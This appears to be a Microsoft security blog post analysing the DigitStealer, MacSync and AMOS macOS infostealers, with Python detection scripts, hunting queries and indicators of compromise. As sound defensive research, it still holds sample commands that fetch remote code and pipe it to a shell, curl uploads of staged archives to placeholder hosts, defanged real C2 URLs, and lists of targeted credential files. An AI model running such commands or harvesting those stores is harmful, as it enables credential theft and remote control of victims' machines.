Microsoft Security Experts Blog

Hunting Infostealers - macOS Threats

FeliciaCarter, Microsoft
Apr 01, 2026
The “Hunting Infostealers” blog series covers the ever-evolving threat of infostealers. Infostealers have gone from simple credential theft to subscription-based threats (i.e., Malware-as-a-Service) driving modern cybercrime. Threat actors target sensitive information such as browser data, cookies, and session tokens that can later be used for account takeovers or to fuel data breaches, ransomware attacks, and supply chain attacks. In this blog series, Microsoft Defender Experts examine how modern infostealers operate across operating systems and delivery channels by blending into legitimate ecosystems and evading conventional defenses.

In this first part of the series, we highlight the rise of macOS-specific infostealers—including families such as DigitStealer, MacSync, and Atomic macOS (AMOS)—that abuse native utilities, user-initiated execution flows, and social-engineering techniques like “ClickFix” installers to harvest credentials and sensitive data. Throughout the blog, we map observed activity to Microsoft Defender XDR coverage and provide actionable guidance to help organizations detect, mitigate, and respond to infostealers.

macOS Threats

Since late 2025, Microsoft Defender Experts (DEX) has observed macOS-targeted infostealer campaigns delivered through social engineering techniques, including ClickFix-style prompts and malicious DMG downloads. These attacks rely on user interaction to initiate execution and are designed to steal credentials, session material, and infrastructure secrets that can enable account takeover, financial theft, and follow-on compromise of cloud and developer resources. Once executed, the malware abuses trusted macOS functionality to collect a wide range of personal, financial, and enterprise-related information. Stolen data can include browser authentication material, operating system credential stores, access keys used for cloud services, and artifacts commonly present on developer or administrator workstations.

The potential impact of this threat extends beyond the infected device. Compromised credentials and session material can enable attackers to take over online accounts, access cloud and enterprise resources, steal cryptocurrency assets, and perform follow-on intrusion activity without needing to maintain persistence on the original system. In organizational environments, this can lead to broader security incidents, including unauthorized access to internal services, cloud environments, or third-party platforms.

DigitStealer

In November 2025, Microsoft Defender Experts (DEX) identified a macOS infostealer campaign tracked as DigitStealer, delivered via a spoofed “DynamicLake” lure. The infection chain begins when users browse to a deceptive domain such as dynamiclake[.]org and download an unsigned disk image, DynamicLake.dmg, then follow a “drag-into-Terminal” execution path: the user drags a file from the mounted image onto a Terminal window, which inserts its path, and presses Enter so the shell runs it as a script. Because Gatekeeper evaluates applications opened through Launch Services rather than scripts executed from an interactive shell, no Gatekeeper prompt is shown.

Figure: dynamiclake[.]org landing page that delivers the unsigned disk image.

Once mounted, DigitStealer executes a Bash-based dropper that uses native tooling (notably curl) to retrieve staged payloads from Cloudflare Pages such as hxxps://b93b559cf522386018e24069ff1a8b7a[.]pages[.]dev/703d2315783f48c0563836f02a3421ed.aspx. In subsequent stages, the malware performs host profiling with system_profiler and uses AppleScript/JXA to drive credential theft and collection, staging artifacts in temporary locations (commonly under /tmp) before compressing content into ZIP archives for outbound transfer.

For exfiltration and C2, DigitStealer uses HTTPS POSTs to structured endpoints and API routes such as /api/grabber, /api/log, and /api/poll, where /api/poll is used for beaconing/tasking while upload routes handle stolen archives. Persistence is established via a macOS LaunchAgent, which can retrieve follow‑on instructions via DNS TXT records (observed use of dig + curl) and immediately execute newly fetched payloads via JXA.

In higher-value (crypto-focused) scenarios, DigitStealer targets wallet workflows including Ledger Live. It has been observed reducing what the user sees by suppressing prompts (behavior related to TCC, the Transparency, Consent, and Control framework that mediates access to protected data) and tampering with wallet application assets (e.g., the Ledger Live.app.asar bundle) to facilitate hijacking.

MacSync

In December 2025, Microsoft Defender Experts (DEX) identified a fileless macOS infostealer campaign referred to as MacSync Stealer, commonly delivered via malvertising and ClickFix-style lures that instruct users to copy and paste commands into Terminal rather than running a traditional installer.

Figure: Webpage instructing users to copy and run a command in Terminal.

During observed MacSync activity, no standalone binaries are dropped. Instead, execution is driven by an in‑memory pipeline that invokes curl with TLS verification disabled, streaming the response directly through decoding/decompression (e.g., curl … | base64 -d | gunzip) without writing intermediate files to disk. This technique reduces disk artifacts and pushes detection toward process/network telemetry rather than file hashes.

MacSync then leverages osascript to indirectly invoke shell execution (e.g., sh -c) to blend into legitimate macOS automation, while harvesting a wide set of artifacts across browsers and credential stores. High-signal targeted files include Chrome databases (Cookies, Login Data, Web Data), Firefox stores (cookies.sqlite, logins.json, key4.db, cert9.db), macOS Keychains (*.keychain-db), and developer/cloud secrets including SSH keys, AWS credentials, and Kubernetes config files, plus shell history such as .zsh_history.

Staging and exfiltration are similarly low‑footprint: data is staged under /tmp using the pattern /tmp/sync[0-9]{7}, compressed using the built‑in ditto utility, and exfiltrated via HTTP POST to attacker infrastructure using a legitimate macOS browser user‑agent. Requests use custom headers (including an API key) to authenticate and manage tasking. Post‑exfiltration cleanup deletes staged directories, reinforcing the transient nature of the intrusion.

Atomic Stealer (AMOS)

In January 2026, Microsoft Defender Experts (DEX) observed active campaigns using Atomic macOS Stealer (AMOS), a highly automated and full-featured macOS infostealer capable of progressing from initial user interaction to persistent command-and-control within minutes. Telemetry shows a modular, high-throughput campaign optimized for credential harvesting, cryptocurrency theft, and long-term operator control using exclusively native macOS tooling.

Initial access was achieved through redirect-based delivery chains that guided victims through multiple intermediary domains, alliai[.]com and alli-ai[.]pro, before downloading a malicious disk image (AlliAi.dmg) hosted on newly registered infrastructure (ai[.]foqguzz[.]com). Upon launch, the unsigned application ran under App Translocation, the randomized read-only path macOS uses for quarantined apps opened from an untrusted location such as a mounted disk image. Translocation confirms the quarantine attribute was present; Gatekeeper was not defeated technically, and the unsigned app ran because the user explicitly overrode the Gatekeeper prompt, the user-driven bypass common to all three campaigns.

Immediately after launch, the trojanized application executed its embedded binary (observed as FXSound) via xpcproxy, establishing outbound network connectivity to attacker‑controlled infrastructure (day.foqguzz[.]com) and spawning a staged Bash loader. The loader decoded and executed a Base64‑encoded script and used curl as an ingress tool transfer mechanism to retrieve next‑stage payloads from hxxp://217.119.139[.]117/d/dayd96331, completing a classic multi‑stage stager pattern.

Once staged, AMOS executed a large modular AppleScript payload via osascript, driving extensive system discovery and data collection. Harvested artifacts included macOS Keychains (for example ~/Library/Keychains/login.keychain‑db), browser credentials and session data from Chrome, Edge, Safari, and Firefox (including SafariCookies.binarycookies), Apple Notes databases, desktop and document files, and deep inspection of browser‑based cryptocurrency wallets through IndexedDB enumeration and targeted extension directory scanning. System metadata was collected via system_profiler to uniquely identify compromised hosts and support operator tasking.

Stolen data was staged under /tmp/17936/, compressed using the built‑in ditto utility into /tmp/out.zip, and exfiltrated via HTTP POST requests to hxxp://217.119.139[.]117/log. Exfiltration requests included custom headers—such as buildid, username, and cid—to uniquely identify victims and manage backend processing. AMOS incorporated retry logic and backoff mechanisms to ensure reliable data transfer before deleting local staging artifacts.

For persistence, AMOS installed a root‑level LaunchDaemon (for example /Library/LaunchDaemons/com.<random>.plist) that re‑executed a Base64‑decoded AppleScript payload at system startup. This established a botnet‑style polling loop to endpoints such as /api/v1/bot/joinsystem/<botid>/<macOS_version> and /api/v1/bot/actions/<botid>, enabling operators to issue commands including doshell, repeat, enablesocks5, and uninstall. The observed activity demonstrates a mature macOS stealer architecture optimized for stealth, scalability, and continuous remote control.
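The persistence described above (a LaunchDaemon or LaunchAgent whose program arguments base64-decode an AppleScript payload and hand it to osascript) is what a host-level triage script should look for. The following Python script is an added example, not Microsoft's code or a Defender detection; it parses launchd property lists with the standard-library plistlib, scores the command they run, and decodes any embedded Base64 blob so an analyst can see what the job actually executes. The two sample plists, the job label com.a1b2c3.plist, the example.invalid URL, and the stand-in AppleScript are constructed for the example and were not recovered from any campaign.

```python
import base64
import binascii
import os
import plistlib
import re

# Constructed sample plists (not recovered from any campaign). Labels, paths and
# the payload are placeholders chosen for this example.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""

# Stand-in AppleScript, Base64-wrapped the way the persistence job described above wraps its payload.
PAYLOAD_B64 = base64.b64encode(
    b'do shell script "curl -s http://example.invalid/api/v1/bot/actions/1 | sh"').decode()

SUSPICIOUS_PLIST = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.a1b2c3.plist</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>echo {PAYLOAD_B64} | base64 -d | osascript</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
""".encode()

# Each indicator is weak on its own (osascript has legitimate launchd users); the
# verdict below requires at least two of them to line up.
INDICATORS = [
    (re.compile(r"\bosascript\b"), "invokes osascript (AppleScript/JXA)"),
    (re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"), "base64-decodes an embedded payload"),
    (re.compile(r"\bcurl\b"), "fetches content with curl"),
    (re.compile(r"\b(?:sh|bash|zsh)\s+-c\b"), "wraps a command string in a shell"),
    (re.compile(r"/(?:private/)?tmp/|/var/folders/"), "references a temporary path"),
]
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_embedded(cmdline):
    """Return the text of the first Base64 blob in cmdline that decodes to mostly printable data."""
    for m in B64_BLOB.finditer(cmdline):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="replace")
        if text and sum(c.isprintable() for c in text) / len(text) > 0.9:
            return text
    return None


def triage_launch_item(plist_bytes):
    """Parse one launchd plist and explain why (or whether) its job looks like stealer persistence."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    cmdline = " ".join(str(a) for a in args)
    reasons = [why for pat, why in INDICATORS if pat.search(cmdline)]
    decoded = decode_embedded(cmdline)
    if decoded is not None:
        reasons.append("embeds a Base64 blob that decodes to: " + decoded[:60])
    if job.get("RunAtLoad") is True:
        reasons.append("RunAtLoad is set (executes at boot or login)")
    return {"label": job.get("Label"), "cmdline": cmdline,
            "reasons": reasons, "suspicious": len(reasons) >= 2}


def scan_launch_dirs(dirs=("/Library/LaunchDaemons", "/Library/LaunchAgents",
                           os.path.expanduser("~/Library/LaunchAgents"))):
    """Triage every .plist in the standard launchd locations of the host this runs on."""
    results = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            try:
                with open(path, "rb") as fh:
                    r = triage_launch_item(fh.read())
            except Exception as exc:  # unreadable or malformed plist: surface it rather than skip it
                r = {"label": None, "cmdline": "", "reasons": [f"unparseable: {exc}"], "suspicious": False}
            r["path"] = path
            results.append(r)
    return results


if __name__ == "__main__":
    for sample in (BENIGN_PLIST, SUSPICIOUS_PLIST):
        print(triage_launch_item(sample))
    for r in scan_launch_dirs():
        if r["suspicious"]:
            print("REVIEW:", r["path"], r["reasons"])
```

Run it on a macOS host to sweep the real launchd directories; on any other system the embedded samples alone exercise the logic. The decode step matters in practice: the job's plist is what survives after the stealer has deleted its staging directory, and the decoded AppleScript names the C2 path the host will poll.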

Shared Characteristics Across macOS Infostealer Campaigns

Despite differences in tooling and maturity, DigitStealer, MacSync Stealer, and Atomic macOS (AMOS) exhibit a converging macOS infostealer tradecraft driven by user‑initiated execution, fileless delivery, and deep abuse of native macOS frameworks. All three campaigns rely on social engineering—such as malvertising, redirect chains, or ClickFix‑style prompts—to coerce users into mounting unsigned DMGs or executing commands directly in Terminal, effectively bypassing Gatekeeper through explicit user action.

Payload delivery is predominantly fileless and multi‑stage, leveraging native utilities such as curl piped through Base64 decoding and decompression for in‑memory execution. Extensive use of AppleScript and JavaScript for Automation (JXA), alongside additional living‑off‑the‑land binaries (system_profiler, dscl, ditto, and shell interpreters), enables attackers to execute complex workflows while blending malicious activity into legitimate system automation.

All three campaigns aggressively harvest credentials and sensitive artifacts from browsers, macOS Keychains, and developer or cloud environments, while explicitly probing cryptocurrency wallets to prioritize financially valuable victims. Stolen data is staged temporarily (commonly under /tmp), compressed using built‑in archiving utilities, and exfiltrated via HTTP or HTTPS POST requests that mimic legitimate browser traffic, followed by immediate cleanup. Where persistence is required, campaigns rely on LaunchAgents or LaunchDaemons and dynamic tasking mechanisms (such as C2 polling or DNS‑based updates) to maintain access without redeployment.

Taken together, these behaviors highlight why macOS has become an increasingly attractive target: growing adoption in enterprise and developer environments, a rich set of built‑in automation and scripting capabilities that favor living‑off‑the‑land tradecraft, persistent user trust in installer and Terminal workflows, and the widespread presence of browser‑based and native cryptocurrency wallets on a single host. These factors have enabled the rise of scalable, high‑volume macOS infostealer ecosystems that rival traditional Windows‑centric campaigns in both sophistication and impact.

Figure: General macOS infostealer attack chain.

Mitigation and protection guidance

Microsoft recommends the following mitigations to reduce the impact of the macOS-focused threats discussed in this report. They align with protections offered across Microsoft Defender XDR.

Organizations can follow these recommendations to mitigate the threats described in this blog:

Strengthen user awareness & execution safeguards

  • Educate users on social‑engineering lures, including malvertising redirect chains, fake installers, and ClickFix‑style copy‑paste prompts common across macOS stealer campaigns such as DigitStealer, MacSync, and AMOS.
  • Discourage installation of unsigned DMGs or unofficial “terminal‑fix” utilities; reinforce safe‑download practices for consumer and enterprise macOS systems.

Harden macOS environments against native tool abuse

  • Monitor for suspicious Terminal activity—especially execution flows involving curl, Base64 decoding, gunzip, osascript, or JXA invocation, which appear across all three macOS stealers.
  • Detect patterns of fileless execution, such as in‑memory pipelines using curl | base64 -d | gunzip, or AppleScript‑driven system discovery and credential harvesting.
  • Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
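The monitoring guidance above, and the MacSync and AMOS behavior described earlier (curl with TLS verification disabled piped through base64 and gunzip, osascript spawning a shell, access to browser and Keychain stores, dig for TXT tasking, curl uploads of a /tmp archive), translates into a handful of command-line rules. The following Python script is an added example, not Microsoft's code or one of the Defender alerts listed later; it runs those rules over constructed process-creation records shaped like the DeviceProcessEvents columns the hunting queries in this post use. The hostnames, the user jdoe, the example.invalid domain, and every sample command line are assumptions built for the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record, shaped like the DeviceProcessEvents columns
    used by the hunting queries in this post (parent name, process name, command line)."""
    host: str
    parent: str   # InitiatingProcessFileName
    name: str     # FileName
    cmdline: str  # ProcessCommandLine


# Patterns distilled from the tradecraft described in this post. Each keys on a
# behavior rather than on a hash or a domain, so it survives infrastructure churn.
INSECURE_CURL = re.compile(r"\bcurl\b[^|]*\s(?:-k|--insecure)\b")
FILELESS_PIPE = re.compile(
    r"\bcurl\b.*\|\s*base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:gunzip|zcat|gzip\s+-d)\b")
SENSITIVE_STORE = re.compile(
    r"Login Data|Cookies|Web Data|cookies\.sqlite|logins\.json|key4\.db|cert9\.db|"
    r"\.keychain-db|\.aws/credentials|\.kube/config|\.ssh/id_|\.zsh_history|\.bash_history")
DNS_TXT = re.compile(r"\bTXT\b", re.IGNORECASE)
ARCHIVE_UPLOAD = re.compile(r"\bcurl\b.*(?:-F\s+\S+=@|--upload-file\s|--data-binary\s+@)")
TMP_STAGING = re.compile(r"/tmp/(?:sync)?\d{5,7}\b")  # /tmp/sync1234567 and /tmp/17936 style
SHELLS = {"sh", "bash", "zsh"}

RULES = [
    ("insecure_curl", lambda e: bool(INSECURE_CURL.search(e.cmdline))),
    ("fileless_pipeline", lambda e: bool(FILELESS_PIPE.search(e.cmdline))),
    ("osascript_spawned_shell", lambda e: e.parent == "osascript" and e.name in SHELLS),
    ("sensitive_store_access", lambda e: bool(SENSITIVE_STORE.search(e.cmdline))),
    ("dns_txt_tasking", lambda e: e.name == "dig" and bool(DNS_TXT.search(e.cmdline))),
    ("staged_archive_upload", lambda e: bool(ARCHIVE_UPLOAD.search(e.cmdline))),
    ("tmp_staging_path", lambda e: bool(TMP_STAGING.search(e.cmdline))),
]

# Constructed sample telemetry (not real events): hostnames, user, paths and the
# example.invalid domain are placeholders modeled on the behaviors in this post.
SAMPLE_EVENTS = [
    ProcEvent("mac-01", "Terminal", "zsh",
              "zsh -c 'curl -k -s https://example.invalid/s | base64 -d | gunzip | sh'"),
    ProcEvent("mac-01", "zsh", "curl", "curl -k -s https://example.invalid/s"),
    ProcEvent("mac-01", "osascript", "sh",
              "sh -c 'cp \"/Users/jdoe/Library/Application Support/Google/Chrome/Default/Login Data\" /tmp/sync1234567/'"),
    ProcEvent("mac-01", "sh", "dig", "dig +short TXT tasks.example.invalid"),
    ProcEvent("mac-01", "zsh", "curl",
              "curl -k -X POST -H 'api-key: 0123' --max-time 60 -F file=@/tmp/sync1234567.zip -F buildtxd=1 https://example.invalid/upload"),
    ProcEvent("mac-07", "zsh", "curl", "curl -sSL https://example.invalid/release.tar.gz -o release.tar.gz"),
    ProcEvent("mac-07", "zsh", "git", "git status"),
]


def match_rules(event):
    """Return the names of every rule the event trips, in RULES order."""
    return [name for name, pred in RULES if pred(event)]


def triage(events, min_rules=3):
    """Collapse per-event hits into per-host findings. Any single rule can fire on
    benign activity (developers do run curl -k); a host tripping several distinct
    rules is what actually resembles the stealer chain."""
    per_host = {}
    for e in events:
        for rule in match_rules(e):
            per_host.setdefault(e.host, set()).add(rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{e.host:7} {e.parent:>9} -> {e.name:<5} {match_rules(e)}")
    print("flagged hosts:", triage(SAMPLE_EVENTS))
```

The per-host threshold is the part worth keeping when porting this to a SIEM: the individual rules are intentionally loose, and the signal is several of them firing on one host within the same session.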

Control outbound traffic & staging behavior

  • Inspect network egress for POST requests to newly registered or suspicious domains—a key indicator for DigitStealer, MacSync, and AMOS.
  • Detect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts.
  • Block direct access to known C2 infrastructure where possible, informed by your organization’s threat‑intelligence sources.
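The staging-then-upload-then-delete sequence called out above is a correlation problem rather than a single-event match: the archive under /tmp, the curl POST that references it (with the victim-identifying headers the AMOS and MacSync sections describe, and the retries AMOS performs), and the deletion that follows all land on one host within seconds. The following Python script is an added example, not Microsoft's code, that joins file and process events per host inside a time window. The timeline, hostnames, header values and example.invalid domain are constructed for the example.

```python
import re
from datetime import datetime, timedelta

ARCHIVE = re.compile(r"(?:/private)?/tmp/\S+\.zip\b|/var/folders/\S+\.zip\b")
UPLOAD = re.compile(r"\bcurl\b.*(?:-F\s+\S+=@|--upload-file\s|--data-binary\s+@)")
# Header names this post reports stealers using to identify the victim or authenticate to C2.
VICTIM_HEADERS = re.compile(r"-H\s+['\"]?(buildid|username|cid|api-key|hwid)\s*:", re.IGNORECASE)

# Constructed timeline (not real telemetry): (timestamp, host, event kind, detail).
EVENTS = [
    ("2026-01-15T10:02:11Z", "mac-02", "file_create", "/tmp/out.zip"),
    ("2026-01-15T10:02:13Z", "mac-02", "process",
     "curl -X POST -H 'buildid: 9b1' -H 'username: jdoe' -H 'cid: 42' -F file=@/tmp/out.zip http://example.invalid/log"),
    ("2026-01-15T10:02:16Z", "mac-02", "process",  # retry after a failed attempt
     "curl -X POST -H 'buildid: 9b1' -H 'username: jdoe' -H 'cid: 42' -F file=@/tmp/out.zip http://example.invalid/log"),
    ("2026-01-15T10:02:20Z", "mac-02", "file_delete", "/tmp/out.zip"),
    ("2026-01-15T10:05:00Z", "mac-03", "file_create", "/tmp/build.zip"),  # benign build artifact, never uploaded
    ("2026-01-15T10:10:00Z", "mac-04", "file_create", "/tmp/sync1234567.zip"),
    ("2026-01-15T10:10:05Z", "mac-04", "process",
     "curl -k -X POST -H 'api-key: 7f3' --max-time 60 -F file=@/tmp/sync1234567.zip https://example.invalid/up"),
    ("2026-01-15T10:20:00Z", "mac-04", "file_delete", "/tmp/sync1234567.zip"),  # outside the default window
]


def parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def correlate(events, window=timedelta(minutes=5)):
    """For every archive created under a temp path, look forward up to `window` on the
    same host for a curl upload that names it and a deletion that follows the upload."""
    by_host = {}
    for ts, host, kind, detail in events:
        by_host.setdefault(host, []).append((parse_ts(ts), kind, detail))
    findings = []
    for host, evs in by_host.items():
        evs.sort()
        for i, (t0, kind, detail) in enumerate(evs):
            if kind != "file_create" or not ARCHIVE.search(detail):
                continue
            f = {"host": host, "archive": detail, "staged_at": t0.isoformat(),
                 "stages": ["staged"], "upload_attempts": 0, "victim_headers": []}
            for t1, k1, d1 in evs[i + 1:]:
                if t1 - t0 > window:
                    break
                if k1 == "process" and detail in d1 and UPLOAD.search(d1):
                    f["upload_attempts"] += 1
                    if "exfiltrated" not in f["stages"]:
                        f["stages"].append("exfiltrated")
                    f["victim_headers"] = [h.lower() for h in VICTIM_HEADERS.findall(d1)]
                elif k1 == "file_delete" and d1 == detail and "exfiltrated" in f["stages"]:
                    f["stages"].append("cleaned")
            if "exfiltrated" in f["stages"]:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f)
```

A staged archive with no upload (mac-03) produces nothing, which keeps build pipelines out of the queue; the window is the tuning knob, and the mac-04 case shows that a cleanup outside it is simply not credited rather than causing the finding to be dropped.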

Microsoft also recommends the following mitigations to reduce the impact of this threat.

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. Note that EDR in block mode is supported on Windows endpoints only; for the macOS hosts discussed here, the real-time protection, behavior monitoring, and network protection settings below provide the equivalent blocking.
  • Enable real-time protection for macOS in Microsoft Defender Antivirus.
  • Enable real-time behavior monitoring for macOS in Microsoft Defender Antivirus.
  • Enable network protection for macOS in Microsoft Defender for Endpoint.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Allow investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Turn on tamper protection features to prevent attackers from stopping security services. On macOS, deploy tamper protection in block mode through your MDM profile so that local administrators cannot disable Defender or change its configuration. The DisableLocalAdminMerge setting, which prevents local administrators from adding antivirus exclusions, applies to Windows endpoints only.

Microsoft Defender XDR detections   

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Tactic / Observed activity / Microsoft Defender coverage

Execution
  Observed activity: Execution of various commands and scripts via osascript and sh
  Microsoft Defender for Endpoint:
    - Suspicious piped command launched
    - Suspicious AppleScript activity
    - Suspicious script launched

Persistence
  Observed activity: LaunchAgent or LaunchDaemon for recurring execution
  Microsoft Defender for Endpoint:
    - Suspicious plist modifications
    - Suspicious launchctl tool activity
  Microsoft Defender Antivirus:
    - Trojan:AtomicSteal.F

Defense Evasion
  Observed activity: Deletion of data staging directories
  Microsoft Defender for Endpoint:
    - Suspicious path deletion

Credential Access
  Observed activity: Credential and secret harvesting; cryptocurrency wallet probing
  Microsoft Defender for Endpoint:
    - Suspicious access of sensitive files
    - Suspicious process collected data from local system
    - Unix credentials were illegitimately accessed

Collection
  Observed activity: Sensitive browser information compressed into a ZIP file for exfiltration
  Microsoft Defender for Endpoint:
    - Compression of sensitive data
    - Suspicious Staging of Data
    - Suspicious archive creation

Exfiltration
  Observed activity: Exfiltration through curl
  Microsoft Defender for Endpoint:
    - Suspicious file or content ingress
    - Network connection by osascript

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender XDR Threat analytics 

Hunting queries 

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Use the following queries to identify activity related to DigitStealer:

// Identify suspicious DynamicLake disk image (.dmg) mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev' , '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'

// Identify data exfiltration to DigitStealer C2 API endpoints.
DeviceProcessEvents
| where InitiatingProcessFileName has_any ('bash', 'sh')
| where ProcessCommandLine has_all ('curl', '--retry 10')
| where ProcessCommandLine contains 'hwid='
| where ProcessCommandLine endswith "api/credentials"
        or ProcessCommandLine endswith "api/grabber"
        or ProcessCommandLine endswith "api/log"
| extend APIEndpoint = extract(@"/api/([^\s]+)", 1, ProcessCommandLine)

Use the following query to identify activity related to MacSync:

// Identify exfiltration of staged data via curl
DeviceProcessEvents
| where InitiatingProcessFileName =~ "zsh" and FileName =~ "curl"
| where ProcessCommandLine has_all ("curl -k -X POST -H", "api-key: ", "--max-time", "-F file=@/tmp/", ".zip", "-F buildtxd=")

Use the following query to identify activity related to Atomic Stealer (AMOS):

// Identify suspicious AlliAi disk image (.dmg) mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev', '-o quarantine')
| where ProcessCommandLine contains '/Volumes/ALLI'

Indicators of compromise

Indicator / Type / Description

SHA-256 (payloads related to the DigitStealer campaign):
  3e20ddb90291ac17cef9913edd5ba91cd95437da86e396757c9d871a82b1282a
  da99f7570b37ddb3d4ed650bc33fa9fbfb883753b2c212704c10f2df12c19f63

SHA-256 (payload related to Atomic Stealer (AMOS)):
  42d51feea16eac568989ab73906bbfdd41641ee3752596393a875f85ecf06417

IP address (AMOS C2 server):
  217.119.139[.]117

Domain (deceptive domain used to deliver the unsigned disk image; DigitStealer campaign):
  dynamiclake[.]org

Domain (C2 servers; DigitStealer campaign):
  booksmagazinetx[.]com
  goldenticketsshop[.]com

Domain (Cloudflare Pages hosting payloads; DigitStealer campaign):
  b93b559cf522386018e24069ff1a8b7a[.]pages[.]dev
  67e5143a9ca7d2240c137ef80f2641d6[.]pages[.]dev

Domain (C2 servers; MacSync Stealer campaign):
  barbermoo[.]coupons
  barbermoo[.]fun
  barbermoo[.]shop
  barbermoo[.]space
  barbermoo[.]today
  barbermoo[.]top
  barbermoo[.]world
  barbermoo[.]xyz

Domain (deceptive domain that redirects the user after CAPTCHA verification; AMOS campaign):
  alli-ai[.]pro

Domain (redirect destination used to deliver the unsigned disk image; AMOS campaign):
  ai[.]foqguzz[.]com

Domain (C2 server; AMOS campaign):
  day[.]foqguzz[.]com

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 

References

MacSync Stealer Evolves: From ClickFix to Code-Signed Swift Malware — Jamf Threat Labs

Learn more  

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

Updated Mar 25, 2026
Version 1.0